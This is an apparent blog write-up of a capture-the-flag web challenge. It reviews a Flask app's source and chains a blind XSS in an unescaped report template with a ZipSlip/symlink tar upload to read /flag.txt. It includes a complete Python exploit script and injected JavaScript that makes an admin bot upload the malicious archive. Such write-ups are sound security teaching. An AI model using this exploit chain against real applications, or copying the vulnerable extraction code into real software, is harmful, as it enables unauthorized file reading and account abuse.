Skip to main content

Command Palette

Search for a command to run...

B-XSS -> ZipSlip -> Local File Read

Updated
9 min read
B-XSS -> ZipSlip -> Local File Read
G
Hey there 👋 , I'm Godson, a dude who loves doing source-code reviews and web security 👨‍💻. I'm passionate about ensuring that web applications are secure 🔒 uncovering vulnerabilities 🐞 and keeping applications safe 🔐.

As usual, I got some time to play CTFs and decided to join my Team, TamilCTF, to play Cyber Apocalypse CTF 2022 (organized by HackTheBox). Let’s see a solution for one of the web challenges I solved during the event that I found interesting.

💡
Challenge Name: Acnologia Portal

Introduction

  • The following screenshot shows how the web app looks like:

  • We are provided with the source code, and the following screenshot shows the source code structure:

Report:

  • The following screenshot shows that the app has a reporting feature. It also has a bot. So, we need an XSS:

Source Code:

database.py (nothing super interesting — you can skip if you want)

from flask_sqlalchemy import SQLAlchemy
from sqlalchemy_serializer import SerializerMixin
from flask_login import UserMixin
from flask import current_app

db = SQLAlchemy()

class User(db.Model, UserMixin):
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(100), unique=True)
    password = db.Column(db.String(100))

class Firmware(db.Model, UserMixin, SerializerMixin):
    id = db.Column(db.Integer, primary_key=True)
    module = db.Column(db.String(100))
    hw_version = db.Column(db.String(100))
    fw_version = db.Column(db.String(100))
    serial = db.Column(db.String(100))
    hub_id = db.Column(db.String(100))

class Report(db.Model, UserMixin, SerializerMixin):
    id = db.Column(db.Integer, primary_key=True)
    module_id = db.Column(db.Integer)
    reported_by = db.Column(db.String(100))
    issue = db.Column(db.Text)

def clear_reports():
    db.session.query(Report).delete()
    db.session.commit()

def clear_db():
    meta = db.metadata
    for table in reversed(meta.sorted_tables):
        db.session.execute(table.delete())
    db.session.commit()

def migrate_db():
    clear_db()
    # admin user
    db.session.add(User(id=1, username=current_app.config['ADMIN_USERNAME'], password=current_app.config['ADMIN_PASSWORD']))

    # firmwares
    db.session.add(Firmware(id=1, module='Launch pod interface', hw_version='d3', fw_version='2408.b', serial='c6c3b20e', hub_id='17310'))
    db.session.add(Firmware(id=2, module='Oxidizer controller', hw_version='a4', fw_version='1801.c', serial='b20418fc', hub_id='33194'))
    db.session.add(Firmware(id=3, module='Propellant damper', hw_version='b6', fw_version='1705.e', serial='7fdee87d', hub_id='19696'))
    db.session.add(Firmware(id=4, module='RD-983 compressor', hw_version='a1', fw_version='0002.a', serial='b0dae2e3', hub_id='91284'))
    db.session.add(Firmware(id=5, module='Refinery interface', hw_version='g4', fw_version='4323.d', serial='d0f2798d', hub_id='31157'))
    db.session.add(Firmware(id=6, module='Condensation chamber', hw_version='k3', fw_version='3467.p', serial='2e1e7897', hub_id='19850'))
    db.session.add(Firmware(id=7, module='Fission reactor', hw_version='p3', fw_version='9031.g', serial='9c431d03', hub_id='12488'))
    db.session.add(Firmware(id=8, module='Booster core', hw_version='i7', fw_version='7651.g', serial='cd003b79', hub_id='12488'))
    db.session.add(Firmware(id=9, module='Surface calibrator', hw_version='a1', fw_version='4632.g', serial='b320babd', hub_id='14274'))
    db.session.add(Firmware(id=10, module='Nozzle controller', hw_version='f6', fw_version='8731.g', serial='8be939d9', hub_id='78804'))

    db.session.commit()

routes.py

import json
from application.database import User, Firmware, Report, db, migrate_db
from application.util import is_admin, extract_firmware
from flask import Blueprint, jsonify, redirect, render_template, request
from flask_login import current_user, login_required, login_user, logout_user
from application.bot import visit_report

web = Blueprint('web', __name__)
api = Blueprint('api', __name__)

def response(message):
    return jsonify({'message': message})

@web.route('/', methods=['GET'])
def login():
    return render_template('login.html')

@api.route('/login', methods=['POST'])
def user_login():
    if not request.is_json:
        return response('Missing required parameters!'), 401

    data = request.get_json()
    username = data.get('username', '')
    password = data.get('password', '')

    if not username or not password:
        return response('Missing required parameters!'), 401

    user = User.query.filter_by(username=username).first()

    if not user or not user.password == password:
        return response('Invalid username or password!'), 403

    login_user(user)
    return response('User authenticated successfully!')

@web.route('/register', methods=['GET'])
def register():
    return render_template('register.html')

@api.route('/register', methods=['POST'])
def user_registration():
    if not request.is_json:
        return response('Missing required parameters!'), 401

    data = request.get_json()
    username = data.get('username', '')
    password = data.get('password', '')

    if not username or not password:
        return response('Missing required parameters!'), 401

    user = User.query.filter_by(username=username).first()

    if user:
        return response('User already exists!'), 401

    new_user = User(username=username, password=password)
    db.session.add(new_user)
    db.session.commit()

    return response('User registered successfully!')

@web.route('/dashboard')
@login_required
def dashboard():
    return render_template('dashboard.html')

@api.route('/firmware/list', methods=['GET'])
@login_required
def firmware_list():
    firmware_list = Firmware.query.all()
    return jsonify([row.to_dict() for row in firmware_list])

@api.route('/firmware/report', methods=['POST'])
@login_required
def report_issue():
    if not request.is_json:
        return response('Missing required parameters!'), 401

    data = request.get_json()
    module_id = data.get('module_id', '')
    issue = data.get('issue', '')

    if not module_id or not issue:
        return response('Missing required parameters!'), 401

    new_report = Report(module_id=module_id, issue=issue, reported_by=current_user.username)
    db.session.add(new_report)
    db.session.commit()

    visit_report()
    migrate_db()

    return response('Issue reported successfully!')

@api.route('/firmware/upload', methods=['POST'])
@login_required
@is_admin
def firmware_update():
    if 'file' not in request.files:
        return response('Missing required parameters!'), 401

    extraction = extract_firmware(request.files['file'])
    if extraction:
        return response('Firmware update initialized successfully.')

    return response('Something went wrong, please try again!'), 403

@web.route('/review', methods=['GET'])
@login_required
@is_admin
def review_report():
    Reports = Report.query.all()
    return render_template('review.html', reports=Reports)

@web.route('/logout')
@login_required
def logout():
    logout_user()
    return redirect('/')
  • The @login_required middleware checks if the user is authenticated.

  • The @is_admin middleware checks if the user is an administrator. The following snippet shows the @is_admin middleware function code. Note that the check is just the username, and the IP address. It checks if the username is equals to the admin’s username that is configured in the app, and it checks if the IP address if 127.0.0.1.

def is_admin(f):
    @functools.wraps(f)
    def wrap(*args, **kwargs):
        if current_user.username == current_app.config['ADMIN_USERNAME'] and request.remote_addr == '127.0.0.1':
            return f(*args, **kwargs)
        else:
            return abort(401)

    return wrap

Api Routes:

  • The /api/register route handles register user functionality:
@api.route('/register', methods=['POST'])
def user_registration():
    if not request.is_json:
        return response('Missing required parameters!'), 401

    data = request.get_json()
    username = data.get('username', '')
    password = data.get('password', '')

    if not username or not password:
        return response('Missing required parameters!'), 401

    user = User.query.filter_by(username=username).first()

    if user:
        return response('User already exists!'), 401

    new_user = User(username=username, password=password)
    db.session.add(new_user)
    db.session.commit()

    return response('User registered successfully!')

@web.route('/dashboard')
  • The /api/login route handles login functionality:
@api.route('/login', methods=['POST'])
def user_login():
    if not request.is_json:
        return response('Missing required parameters!'), 401

    data = request.get_json()
    username = data.get('username', '')
    password = data.get('password', '')

    if not username or not password:
        return response('Missing required parameters!'), 401

    user = User.query.filter_by(username=username).first()

    if not user or not user.password == password:
        return response('Invalid username or password!'), 403

    login_user(user)
    return response('User authenticated successfully!')
  • /api/firmware/report route handles the Report from user and saves it in the database.

  • visit_report() is the function that is called to make the bot view the submitted report.

  • migrate_db() is the function which clear the clear the database (report column).

@api.route('/firmware/report', methods=['POST'])
@login_required
def report_issue():
    if not request.is_json:
        return response('Missing required parameters!'), 401

    data = request.get_json()
    module_id = data.get('module_id', '')
    issue = data.get('issue', '')

    if not module_id or not issue:
        return response('Missing required parameters!'), 401

    new_report = Report(module_id=module_id, issue=issue, reported_by=current_user.username)
    db.session.add(new_report)
    db.session.commit()

    visit_report()
    migrate_db()

    return response('Issue reported successfully!')
  • The following snippet shows that code handling the /api/firmware/upload route. This can be used to upload files. Note that both the @login_required and @is_admin are set — Meaning, only admin can upload files.
@api.route('/firmware/upload', methods=['POST'])
@login_required
@is_admin
def firmware_update():
    if 'file' not in request.files:
        return response('Missing required parameters!'), 401

    extraction = extract_firmware(request.files['file'])
    if extraction:
        return response('Firmware update initialized successfully.')

    return response('Something went wrong, please try again!'), 403
  • The extract_firmware() function is called to extract the uploaded file, and the following snippet shows the code regarding this:
def extract_firmware(file):
    tmp  = tempfile.gettempdir()
    path = os.path.join(tmp, file.filename)
    file.save(path)

    if tarfile.is_tarfile(path):
        tar = tarfile.open(path, 'r:gz')
        tar.extractall(tmp)

        rand_dir = generate(15)
        extractdir = f"{current_app.config['UPLOAD_FOLDER']}/{rand_dir}"
        os.makedirs(extractdir, exist_ok=True)
        for tarinfo in tar:
            name = tarinfo.name
            if tarinfo.isreg():
                try:
                    filename = f'{extractdir}/{name}'
                    os.rename(os.path.join(tmp, name), filename)
                    continue
                except:
                    pass
            os.makedirs(f'{extractdir}/{name}', exist_ok=True)
        tar.close()
        return True

    return False
  • As observed, at first, the uploaded files are stored in the /tmp and variable path hold the name of the file with path. For example, if a file with a name myfile.tag.gz is uploaded, then it will be stored in the /tmp/myfile.tar.gz directory.
tmp  = tempfile.gettempdir()
path = os.path.join(tmp, file.filename)
file.save(path)
  • Before extracting the saved tar file, it first checks if it is a valid tar file, and if so, it unpacks it and stored it, as shown in the following snippet:
if tarfile.is_tarfile(path):
        tar = tarfile.open(path, 'r:gz')
        tar.extractall(tmp)
  • Furthermore, the following snippet shows a loop that checks if the extracted files are normal files, or a different file like a symlink file.

  • If the extracted files are valid files, then the files are moved to the /app/application/static/firmware/[random_number] directory, which is the application’s static directory — Meaning, we can access the files in this directory from the web application. However, we need to know the value of the [random_number]. If we can leak the [random_number], then we can read files uploaded to the server.

  • If the extracted files are not normal/valid files, then the files are removed from the /tmp directory, and are not moved to /static directory:

for tarinfo in tar:
            name = tarinfo.name
            if tarinfo.isreg():
                try:
                    filename = f'{extractdir}/{name}'
                    os.rename(os.path.join(tmp, name), filename)
                    continue
                except:
                    pass
            os.makedirs(f'{extractdir}/{name}', exist_ok=True)
        tar.close()
  • The /review endpoint can handle GET method, where the reports are rendered in the URL. Additionally, only Admin user can access this route, as shown in the following snippet:
@web.route('/review', methods=['GET'])
@login_required
@is_admin
def review_report():
    Reports = Report.query.all()
    return render_template('review.html', reports=Reports)

Review.html

  • In Review.html, the user input is not sanitized before rendered. As a result, we have an XSS here!
 <div class="card-header"> Reported by : USER
        </div>
        <div class="card-body">
        <p class="card-title">Module ID : {{ report.module_id }}</p>
          <p class="card-text">Issue : {{ report.issue | safe }} </p>
          <a href="#" class="btn btn-primary">Reply</a>
          <a href="#" class="btn btn-danger">Delete</a>
        </div>

Exploit Idea:

  • Now we have an XSS. However, session cookies are set to HTTPOnly. So, we can’t use JavaScript to read it. However, we can still use the cookie using JavaScript without reading it. Regardless, even if we were able to exfiltrate the session cookie, we can’t access the admin endpoints, since the source IP of the request should be equal to 127.0.0.1.

  • With this blind XSS, we can force the bot user to upload a malicious tar file using the /api/firmware/upload endpoint.

  • There is a well-known vulnerability called ZipSlip, which allow us to pack files into tar or zip files, which are path traversal’d when the file is file is unpacked.

  • We can creating a symlink file that pointing to /flag.txt and using Zipslip vulnerability to traversal the extracted files to be stored in the application’s static directory. Since the check to make sure that the files are normal files only happen in the /tmp directory, where the files are initially extracted, our traversal’d file will not be caught.

  • Note: By traversing the extracted files to /app/applicaition/static directory will help us to bypass the tarinfo.isreg() function.

Exploit:

  • To automate this, I wrote a python script:
import requests
import os
import random
import string
import tarfile

letters = string.ascii_lowercase
randomText=  ''.join(random.choice(letters) for i in range(10)) 
url = 'http://localhost:1337'

def registerUser(username, password):
    r = requests.post(url + '/api/register', json={"username":username,"password":password})
    if r.status_code != 200:
        print(r.text)
        exit()  

def loginUser(username, password):
    r = requests.post(url + '/api/login', json={"username":username,"password":password})
    if r.status_code != 200:
        print(r.text)
        exit()    

    session = r.headers['Set-Cookie'].split(';')[0].split('=')[1]
    global cookies
    cookies = {
        'session':session
    }
    r = requests.get(url + '/dashboard', cookies=cookies)

def makeTar():
    os.system(f'mkdir ../app')
    os.system(f'mkdir ../app/application/')
    os.system(f'mkdir ../app/application/static')
    os.system('ln -s /flag.txt getflag.txt; mv getflag.txt ../app/application/static/')

    tar = tarfile.open('exp.tar','w')
    tar.add('../app/application/static/getflag.txt')
    tar.close()

    os.system('gzip exp.tar')
    os.system('rm -rf ../app')

def js():   
    string = os.popen('cat exp.tar.gz | base64 -w0')
    os.system('rm -rf exp.tar.gz')
    b64String = string.read()
    global js 
    js = """
        <script>
        function base64toBlob(base64Data, contentType) {
        contentType = contentType || '';
        var sliceSize = 1024;
        var byteCharacters = atob(base64Data);
        var bytesLength = byteCharacters.length;
        var slicesCount = Math.ceil(bytesLength / sliceSize);
        var byteArrays = new Array(slicesCount);

        for (var sliceIndex = 0; sliceIndex < slicesCount; ++sliceIndex) {
            var begin = sliceIndex * sliceSize;
            var end = Math.min(begin + sliceSize, bytesLength);

            var bytes = new Array(end - begin);
            for (var offset = begin, i = 0; offset < end; ++i, ++offset) {
                bytes[i] = byteCharacters[offset].charCodeAt(0);
            }
            byteArrays[sliceIndex] = new Uint8Array(bytes);
        }
        return new Blob(byteArrays, { type: contentType });
    }

    var b64file = """+f"'{b64String}'"+""";

    var content_type = 'application/x-gtar-compressed';
    var blob = base64toBlob(b64file, content_type);

    var formData = new FormData();
    formData.append('file', blob,'abcd');

    var url = 'http://localhost:1337/api/firmware/upload';
    var request = new XMLHttpRequest();
    request.withCredentials = true;
    request.open('POST', url);
    request.send(formData);
    </script>
    """

def report():
    r = requests.post(url + '/api/firmware/report', cookies=cookies, json={"module_id": "1", "issue": f"{js}"})
    if r.status_code != 200:
        print(r.text)
        exit()

def getflag():
    r = requests.get(url+'/static/getflag.txt')
    print(r.text.strip())
    exit()

def main():
    registerUser(randomText,randomText)
    loginUser(randomText, randomText)
    makeTar()
    js()
    report()
    getflag()

if __name__ == "__main__":
    main()
  • Running it, we get the flag, as shown in the following screenshot:

🚩
FLAG : HTB{des3r1aliz3_4ll_th3_th1ngs}